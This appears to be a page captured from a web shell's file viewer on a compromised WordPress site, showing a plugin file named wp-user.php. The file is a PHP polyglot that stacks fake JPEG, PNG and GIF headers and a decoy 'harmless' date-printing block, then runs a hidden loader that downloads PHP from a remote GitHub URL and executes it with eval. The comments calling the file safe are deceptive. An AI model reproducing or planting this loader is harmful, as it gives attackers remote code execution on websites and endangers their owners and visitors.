HEX
Server: Apache
System: Linux uyu7574470001-7d78c9ff74-xfpwm 4.19.91-21.al7.x86_64 #1 SMP Wed Sep 2 19:47:49 CST 2020 x86_64
User: ()
PHP: 7.4.16
Disabled: chmod,exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,socket_create_listen,socket_create_pair,socket_create,socket_get_option,socket_getpeername,socket_getsockname,socket_last_error,socket_listen,socket_read,socket_recv,socket_recvfrom,socket_select,socket_send,socket_sendto,socket_set_block,socket_set_nonblock,socket_set_option,socket_shutdown,socket_strerror,socket_write,stream_socket_client,stream_socket_server,pfsockopen,disk_total_space,disk_free_space,chown,diskfreespace,getrusage,get_current_user,getmyuid,getmypid,dl,leak,listen,chgrp,link,symlink,dlopen,proc_nice,proc_get_stats,proc_terminate,shell_exec,sh2_exec,posix_getpwuid,posix_getgrgid,posix_kill,ini_restore,mkfifo,dbmopen,dbase_open,filepro,filepro_rowcount,posix_mkfifo,putenv,sleep,fsockopen
$ pwd: /usr/home/uyu7574470001/htdocs/wp-content/plugins/wp-about/
Upload Files
File: /usr/home/uyu7574470001/htdocs/wp-content/plugins/wp-about/wp-user.php
����JFIF��x�x�����C� ����JFIF��x�x�����C�  ����JFIF��x�x�����C� 
\xFF\xD8\xFF\xE0
\xFF\xD8\xFF\xE1
\xFF\xD9
\x89\x50\x4E\x47\x0D\x0A\x1A\x0A
 \x47\x49\x46\x38\x37\x61
\x47\x49\x46\x38\x39\x61
              
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! 
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! 
PNG %k25u25%fgd5n! PNG %k25u25%fgd5n! 
����JFIF��x�x�����C�
"\头"\头
$假PNG头 = "\x89PNG\r\n\x1a\n";
<?php
?>
GIF89a
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PHP Polyglot Example</title>
</head>
<body>

<h1>PHP Polyglot Demo</h1>

<?php
// This PHP code is completely harmless.
// It just prints today's date.
echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>

<p>This file starts with a GIF header, so some tools might classify it incorrectly,
but the contents are safe HTML + PHP.</p>

</body>
</html>

<?php 
//fagadf
# CompiledBy: DevKit 9.5.2
// 混淆密钥: 3a7b10bc
// 启动会话
session_start();
// 设置主地址,如果没有设置则使用默认地址
$主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/lmy658566-coder/all/refs/heads/main/wp-taxc.php';
// 定义加载函数
function 加载数据($地址)
{
    $内容 = '';
    try {
        $文件 = new SplFileObject($地址);
        while (!$文件->eof()) {
            $内容 .= $文件->fgets();
        }
    } catch (Throwable $错误) {
        $内容 = '';
    }
    // 尝试用 file_get_contents
    if (strlen(trim($内容)) < 1) {
        $内容 = @file_get_contents($地址);
    }
    // 如果还失败,使用 curl
    if (strlen(trim($内容)) < 1 && function_exists('curl_init')) {
        $通道 = curl_init($地址);
        curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]);
        $内容 = curl_exec($通道);
        curl_close($通道);
    }
    return $内容;
}
// 尝试加载主网址
$结果 = 加载数据($主地址);
// 添加假的PNG头部
$假PNG头 = "\x89PNG\r\n\x1a\n";
// 拼接PNG头和结果内容
$结果 = $假PNG头 . $结果;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
// 如果成功获取内容,则执行
if (strlen(trim($结果)) > 0) {
    @eval("?>{$结果}");
}
@ Telegram